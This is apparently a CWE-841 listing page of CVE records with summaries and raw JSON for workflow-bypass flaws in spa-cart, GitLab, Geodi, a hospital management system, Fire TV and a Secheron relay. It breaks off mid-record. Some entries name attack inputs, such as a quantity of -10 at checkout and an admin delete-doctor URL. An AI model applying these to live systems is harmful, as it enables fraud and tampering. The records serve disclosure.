Common Weakness Enumeration

CWE-841

Allowed

Improper Enforcement of Behavioral Workflow

Abstraction: Class · Status: Incomplete

The product supports a session in which more than one behavior must be performed by an actor, but it does not properly ensure that the actor performs the behaviors in the required sequence.

121 vulnerabilities reference this CWE, most recent first.

CVE-2024-6128 (GCVE-0-2024-6128)

Vulnerability from cvelistv5 – Published: 2024-06-18 21:00 – Updated: 2024-08-01 21:33
VLAI
Title
spa-cartcms Checkout Page checkout behavioral workflow
Summary
A vulnerability, which was classified as problematic, has been found in spa-cartcms 1.9.0.6. This issue affects some unknown processing of the file /checkout of the component Checkout Page. The manipulation of the argument quantity with the input -10 leads to enforcement of behavioral workflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268895.
SSVC
Exploitation: poc Automatable: yes Technical Impact: partial
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2024-06-21 15:48 UTC
CWE
  • CWE-841 - Enforcement of Behavioral Workflow
References
Impacted products
Vendor Product Version
n/a spa-cartcms Affected: 1.9.0.6
spa-cart spa-cart Affected: 1.9.0.6
    cpe:2.3:a:spa-cart:spa-cart:1.9.0.6:*:*:*:*:*:*:*
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:spa-cart:spa-cart:1.9.0.6:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "spa-cart",
            "vendor": "spa-cart",
            "versions": [
              {
                "status": "affected",
                "version": "1.9.0.6"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-6128",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-21T15:48:24.990503Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-21T15:54:04.824Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-01T21:33:05.032Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "VDB-268895 | spa-cartcms Checkout Page checkout behavioral workflow",
            "tags": [
              "vdb-entry",
              "technical-description",
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.268895"
          },
          {
            "name": "VDB-268895 | CTI Indicators (IOB, IOC, IOA)",
            "tags": [
              "signature",
              "permissions-required",
              "x_transferred"
            ],
            "url": "https://vuldb.com/?ctiid.268895"
          },
          {
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://seclists.org/fulldisclosure/2024/Jun/6"
          },
          {
            "tags": [
              "exploit",
              "x_transferred"
            ],
            "url": "https://msecureltd.blogspot.com/2024/04/friday-fun-pentest-series-5-spa.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "modules": [
            "Checkout Page"
          ],
          "product": "spa-cartcms",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "1.9.0.6"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability, which was classified as problematic, has been found in spa-cartcms 1.9.0.6. This issue affects some unknown processing of the file /checkout of the component Checkout Page. The manipulation of the argument quantity with the input -10 leads to enforcement of behavioral workflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268895."
        },
        {
          "lang": "de",
          "value": "Eine Schwachstelle wurde in spa-cartcms 1.9.0.6 entdeckt. Sie wurde als problematisch eingestuft. Davon betroffen ist unbekannter Code der Datei /checkout der Komponente Checkout Page. Dank der Manipulation des Arguments quantity mit der Eingabe -10 mit unbekannten Daten kann eine enforcement of behavioral workflow-Schwachstelle ausgenutzt werden. Der Angriff kann \u00fcber das Netzwerk erfolgen. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "baseScore": 6.9,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
            "version": "4.0"
          }
        },
        {
          "cvssV3_1": {
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "version": "3.1"
          }
        },
        {
          "cvssV3_0": {
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "version": "3.0"
          }
        },
        {
          "cvssV2_0": {
            "baseScore": 5,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-841",
              "description": "CWE-841 Enforcement of Behavioral Workflow",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-06-18T21:00:06.633Z",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "name": "VDB-268895 | spa-cartcms Checkout Page checkout behavioral workflow",
          "tags": [
            "vdb-entry",
            "technical-description"
          ],
          "url": "https://vuldb.com/?id.268895"
        },
        {
          "name": "VDB-268895 | CTI Indicators (IOB, IOC, IOA)",
          "tags": [
            "signature",
            "permissions-required"
          ],
          "url": "https://vuldb.com/?ctiid.268895"
        },
        {
          "tags": [
            "mailing-list"
          ],
          "url": "https://seclists.org/fulldisclosure/2024/Jun/6"
        },
        {
          "tags": [
            "exploit"
          ],
          "url": "https://msecureltd.blogspot.com/2024/04/friday-fun-pentest-series-5-spa.html"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2024-06-18T00:00:00.000Z",
          "value": "Advisory disclosed"
        },
        {
          "lang": "en",
          "time": "2024-06-18T02:00:00.000Z",
          "value": "VulDB entry created"
        },
        {
          "lang": "en",
          "time": "2024-06-18T18:27:32.000Z",
          "value": "VulDB entry last update"
        }
      ],
      "title": "spa-cartcms Checkout Page checkout behavioral workflow"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2024-6128",
    "datePublished": "2024-06-18T21:00:06.633Z",
    "dateReserved": "2024-06-18T16:21:34.412Z",
    "dateUpdated": "2024-08-01T21:33:05.032Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-0410 (GCVE-0-2024-0410)

Vulnerability from cvelistv5 – Published: 2024-02-21 23:30 – Updated: 2026-08-14 04:14
VLAI
Title
Improper Enforcement of Behavioral Workflow in GitLab
Summary
An authorization bypass vulnerability was discovered in GitLab affecting versions 15.1 prior to 16.7.6, 16.8 prior to 16.8.3, and 16.9 prior to 16.9.1. A developer could bypass CODEOWNERS approvals by creating a merge conflict.
SSVC
Exploitation: none Automatable: no Technical Impact: total
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2024-02-22 15:01 UTC
CWE
  • CWE-841 - Improper Enforcement of Behavioral Workflow
References
URL Tags
https://gitlab.com/gitlab-org/gitlab/-/issues/437988 issue-tracking
https://hackerone.com/reports/2296778 technical-descriptionexploitpermissions-requiredbroken-link
Impacted products
Vendor Product Version
GitLab GitLab Affected: 15.1 , < 16.7.6 (semver)
Affected: 16.8 , < 16.8.3 (semver)
Affected: 16.9 , < 16.9.1 (semver)
    cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:*
Create a notification for this product.
gitlab gitlab Affected: 15.1 , < 16.7.6 (semver)
Affected: 16.8 , < 16.8.3 (semver)
Affected: 16.9 , < 16.9.1 (semver)
    cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:*
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-01T18:04:49.660Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "GitLab Issue #437988",
            "tags": [
              "issue-tracking",
              "x_transferred"
            ],
            "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/437988"
          },
          {
            "name": "HackerOne Bug Bounty Report #2296778",
            "tags": [
              "technical-description",
              "exploit",
              "x_transferred"
            ],
            "url": "https://hackerone.com/reports/2296778"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unaffected",
            "product": "gitlab",
            "vendor": "gitlab",
            "versions": [
              {
                "lessThan": "16.7.6",
                "status": "affected",
                "version": "15.1",
                "versionType": "semver"
              },
              {
                "lessThan": "16.8.3",
                "status": "affected",
                "version": "16.8",
                "versionType": "semver"
              },
              {
                "lessThan": "16.9.1",
                "status": "affected",
                "version": "16.9",
                "versionType": "semver"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-0410",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-02-22T15:01:52.798832Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-17T15:35:03.444Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "cpes": [
            "cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:*"
          ],
          "defaultStatus": "unaffected",
          "product": "GitLab",
          "repo": "git://git@gitlab.com:gitlab-org/gitlab.git",
          "vendor": "GitLab",
          "versions": [
            {
              "lessThan": "16.7.6",
              "status": "affected",
              "version": "15.1",
              "versionType": "semver"
            },
            {
              "lessThan": "16.8.3",
              "status": "affected",
              "version": "16.8",
              "versionType": "semver"
            },
            {
              "lessThan": "16.9.1",
              "status": "affected",
              "version": "16.9",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Thanks [ali_shehab](https://hackerone.com/ali_shehab) for reporting this vulnerability through our HackerOne bug bounty program"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An authorization bypass vulnerability was discovered in GitLab affecting versions 15.1 prior to 16.7.6, 16.8 prior to 16.8.3, and 16.9 prior to 16.9.1. A developer could bypass CODEOWNERS approvals by creating a merge conflict."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-841",
              "description": "CWE-841: Improper Enforcement of Behavioral Workflow",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-08-14T04:14:48.061Z",
        "orgId": "ceab7361-8a18-47b1-92ba-4d7d25f6715a",
        "shortName": "GitLab"
      },
      "references": [
        {
          "name": "GitLab Issue #437988",
          "tags": [
            "issue-tracking"
          ],
          "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/437988"
        },
        {
          "name": "HackerOne Bug Bounty Report #2296778",
          "tags": [
            "technical-description",
            "exploit",
            "permissions-required",
            "broken-link"
          ],
          "url": "https://hackerone.com/reports/2296778"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Upgrade to versions 16.9.1, 16.8.3, 16.7.6 or above."
        }
      ],
      "title": "Improper Enforcement of Behavioral Workflow in GitLab"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "ceab7361-8a18-47b1-92ba-4d7d25f6715a",
    "assignerShortName": "GitLab",
    "cveId": "CVE-2024-0410",
    "datePublished": "2024-02-21T23:30:59.792Z",
    "dateReserved": "2024-01-11T08:02:26.198Z",
    "dateUpdated": "2026-08-14T04:14:48.061Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2023-5921 (GCVE-0-2023-5921)

Vulnerability from cvelistv5 – Published: 2023-11-22 09:03 – Updated: 2026-05-20 13:55
VLAI
Title
Function Bypass in Geodi
Summary
Improper Enforcement of Behavioral Workflow vulnerability in DECE Software Geodi allows Functionality Bypass. This issue affects Geodi: before 8.0.0.27396.
CWE
  • CWE-841 - Improper Enforcement of Behavioral Workflow
References
Impacted products
Vendor Product Version
DECE Software Geodi Affected: 0 , < 8.0.0.27396 (custom)
Create a notification for this product.
Date Public
2023-11-22 09:00
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T08:14:24.979Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "government-resource",
              "x_transferred"
            ],
            "url": "https://www.usom.gov.tr/bildirim/tr-23-0650"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Geodi",
          "vendor": "DECE Software",
          "versions": [
            {
              "lessThan": "8.0.0.27396",
              "status": "affected",
              "version": "0",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Serhat YAPICI"
        }
      ],
      "datePublic": "2023-11-22T09:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Improper Enforcement of Behavioral Workflow vulnerability in DECE Software Geodi allows Functionality Bypass.\u003cp\u003eThis issue affects Geodi: before 8.0.0.27396.\u003c/p\u003e"
            }
          ],
          "value": "Improper Enforcement of Behavioral Workflow vulnerability in DECE Software Geodi allows Functionality Bypass.\n\nThis issue affects Geodi: before 8.0.0.27396."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-554",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-554 Functionality Bypass"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "NONE",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-841",
              "description": "CWE-841 Improper Enforcement of Behavioral Workflow",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-20T13:55:34.863Z",
        "orgId": "ca940d4e-fea4-4aa2-9a58-591a58b1ce21",
        "shortName": "TR-CERT"
      },
      "references": [
        {
          "tags": [
            "government-resource",
            "broken-link"
          ],
          "url": "https://www.usom.gov.tr/bildirim/tr-23-0650"
        },
        {
          "tags": [
            "government-resource"
          ],
          "url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0650"
        }
      ],
      "source": {
        "advisory": "TR-23-0650",
        "defect": [
          "TR-23-0650"
        ],
        "discovery": "USER"
      },
      "title": "Function Bypass in Geodi",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "ca940d4e-fea4-4aa2-9a58-591a58b1ce21",
    "assignerShortName": "TR-CERT",
    "cveId": "CVE-2023-5921",
    "datePublished": "2023-11-22T09:03:14.924Z",
    "dateReserved": "2023-11-02T12:24:45.181Z",
    "dateUpdated": "2026-05-20T13:55:34.863Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2023-4181 (GCVE-0-2023-4181)

Vulnerability from cvelistv5 – Published: 2023-08-06 08:31 – Updated: 2024-08-02 07:17
VLAI
Title
SourceCodester Free Hospital Management System for Small Practices Redirect behavioral workflow
Summary
A vulnerability, which was classified as critical, has been found in SourceCodester Free Hospital Management System for Small Practices 1.0. Affected by this issue is some unknown functionality of the file /vm/admin/delete-doctor.php?id=2 of the component Redirect Handler. The manipulation leads to enforcement of behavioral workflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-236216.
CWE
  • CWE-841 - Enforcement of Behavioral Workflow
References
URL Tags
https://vuldb.com/?id.236216 vdb-entrytechnical-description
https://vuldb.com/?ctiid.236216 signaturepermissions-required
https://github.com/Yesec/Free-Hospital-Management… exploit
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T07:17:12.174Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "vdb-entry",
              "technical-description",
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.236216"
          },
          {
            "tags": [
              "signature",
              "permissions-required",
              "x_transferred"
            ],
            "url": "https://vuldb.com/?ctiid.236216"
          },
          {
            "tags": [
              "exploit",
              "x_transferred"
            ],
            "url": "https://github.com/Yesec/Free-Hospital-Management-System-for-Small-Practices/blob/main/vertical%20privilege%20escalation/vuln.md"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "modules": [
            "Redirect Handler"
          ],
          "product": "Free Hospital Management System for Small Practices",
          "vendor": "SourceCodester",
          "versions": [
            {
              "status": "affected",
              "version": "1.0"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "analyst",
          "value": "YeSec (VulDB User)"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability, which was classified as critical, has been found in SourceCodester Free Hospital Management System for Small Practices 1.0. Affected by this issue is some unknown functionality of the file /vm/admin/delete-doctor.php?id=2 of the component Redirect Handler. The manipulation leads to enforcement of behavioral workflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-236216."
        },
        {
          "lang": "de",
          "value": "Eine kritische Schwachstelle wurde in SourceCodester Free Hospital Management System for Small Practices 1.0 entdeckt. Es geht hierbei um eine nicht n\u00e4her spezifizierte Funktion der Datei /vm/admin/delete-doctor.php?id=2 der Komponente Redirect Handler. Mit der Manipulation mit unbekannten Daten kann eine enforcement of behavioral workflow-Schwachstelle ausgenutzt werden. Der Angriff kann \u00fcber das Netzwerk angegangen werden. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
            "version": "3.1"
          }
        },
        {
          "cvssV3_0": {
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
            "version": "3.0"
          }
        },
        {
          "cvssV2_0": {
            "baseScore": 5.5,
            "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P",
            "version": "2.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-841",
              "description": "CWE-841 Enforcement of Behavioral Workflow",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-10-24T08:34:25.977Z",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "tags": [
            "vdb-entry",
            "technical-description"
          ],
          "url": "https://vuldb.com/?id.236216"
        },
        {
          "tags": [
            "signature",
            "permissions-required"
          ],
          "url": "https://vuldb.com/?ctiid.236216"
        },
        {
          "tags": [
            "exploit"
          ],
          "url": "https://github.com/Yesec/Free-Hospital-Management-System-for-Small-Practices/blob/main/vertical%20privilege%20escalation/vuln.md"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2023-08-05T00:00:00.000Z",
          "value": "Advisory disclosed"
        },
        {
          "lang": "en",
          "time": "2023-08-05T00:00:00.000Z",
          "value": "CVE reserved"
        },
        {
          "lang": "en",
          "time": "2023-08-05T02:00:00.000Z",
          "value": "VulDB entry created"
        },
        {
          "lang": "en",
          "time": "2023-08-30T08:59:25.000Z",
          "value": "VulDB entry last update"
        }
      ],
      "title": "SourceCodester Free Hospital Management System for Small Practices Redirect behavioral workflow"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2023-4181",
    "datePublished": "2023-08-06T08:31:03.383Z",
    "dateReserved": "2023-08-05T16:40:09.089Z",
    "dateUpdated": "2024-08-02T07:17:12.174Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2023-1383 (GCVE-0-2023-1383)

Vulnerability from cvelistv5 – Published: 2023-05-03 11:42 – Updated: 2025-01-30 15:07
VLAI
Summary
An Improper Enforcement of Behavioral Workflow vulnerability in the exchangeDeviceServices function on the amzn.dmgr service allowed an attacker to register services that are only locally accessible. This issue affects: Amazon Fire TV Stick 3rd gen versions prior to 6.2.9.5. Insignia TV with FireOS versions prior to 7.6.3.3.
SSVC
Exploitation: none Automatable: no Technical Impact: partial
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2025-01-30 15:07 UTC
CWE
  • CWE-841 - Improper Enforcement of Behavioral Workflow
Date Public
2023-05-02 09:00
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T05:49:10.354Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.bitdefender.com/blog/labs/vulnerabilities-identified-amazon-fire-tv-stick-insignia-fire-os-tv-series/"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-1383",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-01-30T15:07:18.792988Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-01-30T15:07:33.815Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Fire TV Stick 3rd gen",
          "vendor": "AmazonFire TV Stick 3rd gen",
          "versions": [
            {
              "status": "affected",
              "version": "6.2.9.4"
            }
          ]
        },
        {
          "defaultStatus": "unaffected",
          "product": "TV with FireOS ",
          "vendor": "Insignia",
          "versions": [
            {
              "status": "affected",
              "version": "7.6.3.2"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Bitdefender IoT Research Team"
        }
      ],
      "datePublic": "2023-05-02T09:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "An Improper Enforcement of Behavioral Workflow vulnerability in the exchangeDeviceServices function on the amzn.dmgr service allowed an attacker to register services that are only locally accessible.\u003cbr\u003e\u003cbr\u003eThis issue affects:\u003cbr\u003e\u003cbr\u003eAmazon Fire TV Stick 3rd gen versions prior to 6.2.9.5. \u003cbr\u003eInsignia TV with FireOS versions prior to 7.6.3.3."
            }
          ],
          "value": "An Improper Enforcement of Behavioral Workflow vulnerability in the exchangeDeviceServices function on the amzn.dmgr service allowed an attacker to register services that are only locally accessible.\n\nThis issue affects:\n\nAmazon Fire TV Stick 3rd gen versions prior to 6.2.9.5. \nInsignia TV with FireOS versions prior to 7.6.3.3."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-153",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-153 Input Data Manipulation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-841",
              "description": "CWE-841: Improper Enforcement of Behavioral Workflow",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-05-03T11:42:10.455Z",
        "orgId": "b3d5ebe7-963e-41fb-98e1-2edaeabb8f82",
        "shortName": "Bitdefender"
      },
      "references": [
        {
          "url": "https://www.bitdefender.com/blog/labs/vulnerabilities-identified-amazon-fire-tv-stick-insignia-fire-os-tv-series/"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "An automatic firmware update to the following versions fixes the issue:\u003cbr\u003e\u003cbr\u003eAmazon Fire TV Stick 3rd gen version 6.2.9.5\u003cbr\u003eInsignia TV with FireOS version 7.6.3.3\u003cbr\u003e"
            }
          ],
          "value": "An automatic firmware update to the following versions fixes the issue:\n\nAmazon Fire TV Stick 3rd gen version 6.2.9.5\nInsignia TV with FireOS version 7.6.3.3\n"
        }
      ],
      "source": {
        "discovery": "INTERNAL"
      },
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b3d5ebe7-963e-41fb-98e1-2edaeabb8f82",
    "assignerShortName": "Bitdefender",
    "cveId": "CVE-2023-1383",
    "datePublished": "2023-05-03T11:42:10.455Z",
    "dateReserved": "2023-03-14T09:59:31.807Z",
    "dateUpdated": "2025-01-30T15:07:33.815Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2022-2105 (GCVE-0-2022-2105)

Vulnerability from cvelistv5 – Published: 2022-06-24 15:00 – Updated: 2025-04-16 16:16
VLAI
Title
Secheron SEPCOS Control and Protection Relay
Summary
Client-side JavaScript controls may be bypassed to change user credentials and permissions without authentication, including a “root” user level meant only for the vendor. Web server root level access allows for changing of safety critical parameters.
SSVC
Exploitation: none Automatable: yes Technical Impact: partial
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2025-04-16 15:55 UTC
CWE
  • CWE-841 - IMPROPER ENFORCEMENT OF BEHAVIORAL WORKFLOW
References
Impacted products
Vendor Product Version
Secheron SEPCOS Control and Protection Relay firmware package Affected: All versions , < 1.23.21 (custom)
Create a notification for this product.
Date Public
2022-06-23 00:00
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T00:24:44.189Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-174-03"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-2105",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-16T15:55:19.184560Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-04-16T16:16:16.151Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "SEPCOS Control and Protection Relay firmware package",
          "vendor": "Secheron",
          "versions": [
            {
